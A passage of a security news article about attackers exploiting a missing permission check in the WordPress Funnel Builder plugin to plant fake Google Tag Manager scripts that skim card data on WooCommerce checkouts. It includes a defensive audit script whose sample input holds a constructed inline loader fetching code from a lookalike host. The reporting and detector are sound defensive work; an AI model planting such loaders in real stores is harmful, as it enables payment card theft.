Securityaffairs

Attackers exploit Funnel Builder bug to inject e-skimmers into e-stores

Pierluigi Paganini
May 17, 2026

Attackers are exploiting a critical flaw in the WordPress Funnel Builder plugin to inject skimming code into WooCommerce checkout pages.

A critical vulnerability in the WordPress Funnel Builder plugin is being actively exploited to inject malicious JavaScript into WooCommerce checkout pages, according to Sansec researchers.

Funnel Builder by FunnelKit is a checkout and upsell plugin installed on over 40,000 WooCommerce stores.

Attackers injected e-skimmer code designed to steal customers’ card and payment details during purchases. Website owners using the plugin are urged to apply security updates immediately and review their checkout pages for signs of compromise.

“Attackers are planting fake Google Tag Manager scripts into the plugin’s ‘External Scripts’ setting. The injected code looks like ordinary analytics next to the store’s real tags, but loads a payment skimmer that steals credit card numbers, CVVs and billing addresses from checkout.” reads the report published by Sansec.
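Because the injected tags are designed to blend in next to a store’s real Google Tag Manager snippet, reviewing the “External Scripts” value by eye is error-prone. The script below is an added example (not Sansec’s or FunnelKit’s code) of an allowlist audit a store owner could run over that setting. It assumes the setting is stored as an HTML fragment of `<script>` tags; the allowlisted hosts, the lookalike domain, and the `GTM-PLACEHOLDER` container ID in the sample value are all constructed for the demonstration.

```python
"""Audit a plugin's "External Scripts" setting for script tags that deserve review.

Added example, not code from Sansec or FunnelKit. Assumes the setting holds an
HTML fragment of <script> tags; the sample value and allowlist are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this store legitimately loads tags from (assumption: the site's own allowlist).
ALLOWED_HOSTS = {"www.googletagmanager.com", "www.google-analytics.com"}

# Constructed sample: the real GTM tag, a lookalike-host copy of it, and an
# inline loader of the kind an attacker would plant beside the genuine tag.
SAMPLE_SETTING = """
<script async src="https://www.googletagmanager.com/gtag/js?id=GTM-PLACEHOLDER"></script>
<script async src="https://www.googletagmanager.com.lookalike.example/gtag/js?id=GTM-PLACEHOLDER"></script>
<script>var s=document.createElement('script');s.src='https://cdn.lookalike.example/gtm.js';document.head.appendChild(s);</script>
"""


class _ScriptCollector(HTMLParser):
    """Collect every <script> tag in the fragment: its src (if any) and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []      # list of {"src": str | None, "body": str}
        self._current = None   # the <script> currently being read, if any

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._current = {"src": dict(attrs).get("src"), "body": ""}

    def handle_data(self, data):
        # HTMLParser hands the whole body of a <script> to handle_data.
        if self._current is not None:
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def audit_external_scripts(setting_html, allowed_hosts=ALLOWED_HOSTS):
    """Return findings for script tags that do not match the allowlist.

    Three rules: (1) a src whose host is not allowlisted, (2) a host that only
    *contains* an allowlisted host (a lookalike such as the second sample tag),
    and (3) any inline body, because a setting meant for external URLs should
    not carry loader code at all.
    """
    collector = _ScriptCollector()
    collector.feed(setting_html)
    collector.close()

    findings = []
    for script in collector.scripts:
        src = script["src"]
        if src:
            host = (urlparse(src).hostname or "").lower()
            if host in allowed_hosts:
                continue
            lookalike = any(allowed in host for allowed in allowed_hosts)
            findings.append({
                "kind": "lookalike_host" if lookalike else "unknown_host",
                "detail": src,
            })
        elif script["body"].strip():
            findings.append({"kind": "inline_script", "detail": script["body"].strip()[:80]})
    return findings


if __name__ == "__main__":
    for finding in audit_external_scripts(SAMPLE_SETTING):
        print(f"{finding['kind']:15} {finding['detail']}")
```

Run against the constructed sample it reports the lookalike tag and the inline loader and stays silent on the genuine Google Tag Manager tag; in practice the allowlist would be the handful of hosts the store actually uses, and anything outside it is a reason to compare the stored setting against the last known-good copy.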

The researchers state that a critical flaw in the WordPress Funnel Builder plugin lets unauthenticated attackers inject malicious scripts into WooCommerce checkout pages. The vulnerable endpoint fails to verify permissions and allows attackers to modify global plugin settings, including the “External Scripts” option. By planting a malicious